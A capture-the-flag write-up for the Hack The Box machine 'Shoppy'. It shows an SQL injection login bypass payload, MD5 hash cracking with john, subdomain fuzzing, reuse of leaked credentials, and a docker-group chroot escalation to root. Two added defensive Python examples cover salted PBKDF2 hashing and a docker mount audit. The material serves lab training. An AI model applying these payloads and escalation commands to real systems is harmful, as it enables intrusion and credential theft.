Shoppy
Port recognition with nmap,
or you can use the recon script, which wraps nmap, web server fingerprinting and dirb
┌──(root@ghost)-[/home/ghost]
└─# recon shoppy.htb
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-18 07:22 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:22
Completed NSE at 07:22, 0.00s elapsed
Initiating Ping Scan at 07:22
Scanning shoppy.htb (10.10.11.180) [4 ports]
Completed Ping Scan at 07:22, 0.39s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:22
Scanning shoppy.htb (10.10.11.180) [65535 ports]
Discovered open port 80/tcp on 10.10.11.180
Discovered open port 22/tcp on 10.10.11.180
Discovered open port 9093/tcp on 10.10.11.180
Completed SYN Stealth Scan at 07:22, 22.48s elapsed (65535 total ports)
NSE: Script scanning 10.10.11.180.
Initiating NSE at 07:22
Completed NSE at 07:22, 0.00s elapsed
Nmap scan report for shoppy.htb (10.10.11.180)
Host is up (0.13s latency).
Not shown: 63243 closed tcp ports (reset), 2289 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9093/tcp open copycat
NSE: Script Post-scanning.
Initiating NSE at 07:22
Completed NSE at 07:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 23.18 seconds
Raw packets sent: 110486 (4.861MB) | Rcvd: 75267 (3.028MB)
[i] [Server info]
http://shoppy.htb:80 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.23.1], IP[10.10.11.180], JQuery, Script, Title[Shoppy Wait Page][Title element contains newline(s)!], nginx[1.23.1]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 18 07:22:40 2022
URL_BASE: http://shoppy.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://shoppy.htb:80/ ----
+ http://shoppy.htb:80/admin (CODE:302|SIZE:28)
+ http://shoppy.htb:80/Admin (CODE:302|SIZE:28)
+ http://shoppy.htb:80/ADMIN (CODE:302|SIZE:28)
+ http://shoppy.htb:80/assets (CODE:301|SIZE:179)
+ http://shoppy.htb:80/css (CODE:301|SIZE:173)
+ http://shoppy.htb:80/exports (CODE:301|SIZE:181)
+ http://shoppy.htb:80/favicon.ico (CODE:200|SIZE:213054)
+ http://shoppy.htb:80/fonts (CODE:301|SIZE:177)
+ http://shoppy.htb:80/images (CODE:301|SIZE:179)
+ http://shoppy.htb:80/js (CODE:301|SIZE:171)
+ http://shoppy.htb:80/login (CODE:200|SIZE:1074)
+ http://shoppy.htb:80/Login (CODE:200|SIZE:1074)
-----------------
END_TIME: Tue Oct 18 07:34:55 2022
DOWNLOADED: 4612 - FOUND: 12
recon reports three open ports (22, 80 and 9093), the web server version (nginx/1.23.1) and a few directories found by dirb, among them /admin and /login

We found a login page that is vulnerable to SQL injection in several places; the payload we used was admin' || '1=1


Search for users with the same injection, admin' || '1=1

Click on Download export

We obtained the hashed credentials of admin and josh
┌──(root@ghost)-[/home/ghost]
└─# cat hashes
23c6877d9e2b564ef8b32c3a23de27b2
6ebcea65320589ca4f2f1ce039975995
┌──(root@ghost)-[/home/ghost]
└─# john --format=RAW-MD5 --wordlist=rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
remembermethisway (?)
1g 0:00:00:00 DONE (2022-10-18 08:00) 1.724g/s 24729Kp/s 24729Kc/s 26130KC/s fuckyooh21..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
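The two hashes fell to a wordlist in under a second because the application stored raw, unsalted MD5 (john loads them as "Raw-MD5" with "no different salts"). This added example, not code from the box or the writeup, contrasts that storage with a salted PBKDF2 scheme and a constant-time verify; the password is the one recovered above, the salts are generated per call.

```python
import hashlib
import hmac
import os

# Raw MD5 as the Shoppy app stored it: no salt, so identical passwords
# give identical digests and one hashed wordlist matches every user.
def raw_md5(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()

# Salted PBKDF2-HMAC-SHA256 with a per-user random salt and a work factor.
ITERATIONS = 600_000

def pbkdf2_hash(password: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)  # fresh random salt unless caller supplies one
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def pbkdf2_verify(password: str, stored: str) -> bool:
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # constant-time comparison so timing does not leak matching prefixes
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    pw = "remembermethisway"  # password cracked in the writeup
    print(raw_md5(pw) == raw_md5(pw))            # True: unsalted, repeatable
    s1, s2 = pbkdf2_hash(pw), pbkdf2_hash(pw)
    print(s1 != s2, pbkdf2_verify(pw, s1))       # True True: salted, still verifiable
```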
Trying josh's credentials on SSH fails, so maybe we should look for subdomains; we need another site to log in to
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c -w /usr/share/seclists/Discovery/DNS/namelist.txt --hc 400,404,403,301 -H "Host: FUZZ.shoppy.htb" http://shoppy.htb
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://shoppy.htb/
Total requests: 151265
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000082865: 200 0 L 141 W 3122 Ch "mattermost"
Total time: 0
Processed Requests: 151265
Filtered Requests: 151264
Requests/sec.: 0
We found the mattermost subdomain; add it to /etc/hosts
┌──(root@ghost)-[/home/ghost]
└─# cat /etc/hosts
10.10.11.180 shoppy.htb mattermost.shoppy.htb


Credentials found there: jaeger:Sh0ppyBest@pp!
┌──(root@ghost)-[/home/ghost]
└─# ssh jaeger@shoppy.htb
The authenticity of host 'shoppy.htb (10.10.11.180)' can't be established.
ED25519 key fingerprint is SHA256:RISsnnLs1eloK7XlOTr2TwStHh2R8hui07wd1iFyB+8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shoppy.htb' (ED25519) to the list of known hosts.
jaeger@shoppy.htb's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ cat user.txt
b6704531a2935f3e0a1c7f08bdc4f757
We are in the system as user jaeger; let's try to escalate to root
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
As we can see, we can run /home/deploy/password-manager as the deploy user
jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sh0ppyBest@pp!
Access denied! This incident will be reported !

Running cat on the binary leaks the string Sample, which did not show up with the strings command
jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
We have the deploy credentials
jaeger@shoppy:~$ su deploy
Password:
$ whoami
deploy
$ groups
deploy docker
User deploy is a member of the docker group
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root
# cat /root/root.txt
91fb00fafd53647e47f7726ffb797cba
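The last step works because membership of the docker group lets a user bind-mount the host's root filesystem into a container and chroot into it, which is equivalent to root on the host. This added example, not part of the writeup, is a small defender-side audit over `docker inspect` output: it flags containers that bind-mount the host root or other sensitive paths, or that run privileged or in the host PID namespace. The inspect records are constructed to mirror the container started above and one harmless volume-backed container.

```python
import json

# Host paths that must not be bind-mounted into an untrusted container.
SENSITIVE = ("/etc", "/root", "/proc", "/sys",
             "/var/run/docker.sock", "/run/docker.sock")

def is_sensitive(src: str) -> bool:
    """True if a bind-mount source is the host root or under a sensitive path."""
    src = src.rstrip("/") or "/"
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE)

def audit_container(record: dict) -> list:
    """Return human-readable findings for one `docker inspect` record."""
    findings = []
    name = record.get("Name", "?").lstrip("/")
    host = record.get("HostConfig", {})
    if host.get("Privileged"):
        findings.append(f"{name}: runs --privileged")
    if host.get("PidMode") == "host":
        findings.append(f"{name}: shares the host PID namespace")
    for m in record.get("Mounts", []):
        if m.get("Type") == "bind" and is_sensitive(m.get("Source", "")):
            mode = "rw" if m.get("RW", True) else "ro"
            findings.append(f"{name}: bind-mounts host {m['Source']} "
                            f"at {m['Destination']} ({mode})")
    return findings

def audit(inspect_json: str) -> list:
    """Audit the JSON array printed by `docker inspect <containers...>`."""
    return [f for rec in json.loads(inspect_json) for f in audit_container(rec)]

# Constructed sample in the shape of `docker inspect` output: the first
# record is what `docker run -v /:/mnt --rm -it alpine chroot /mnt sh`
# produces, the second is a normal named-volume container.
SAMPLE = json.dumps([
    {"Name": "/sleepy_lamport",
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}],
     "HostConfig": {"Privileged": False, "PidMode": ""}},
    {"Name": "/web",
     "Mounts": [{"Type": "volume", "Name": "webdata",
                 "Source": "/var/lib/docker/volumes/webdata/_data",
                 "Destination": "/data", "RW": True}],
     "HostConfig": {"Privileged": False, "PidMode": ""}},
])

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

In practice feed it `docker inspect $(docker ps -q)`; the same checks belong in the daemon's authorization plugin or an admission policy so that the mount is refused rather than merely reported.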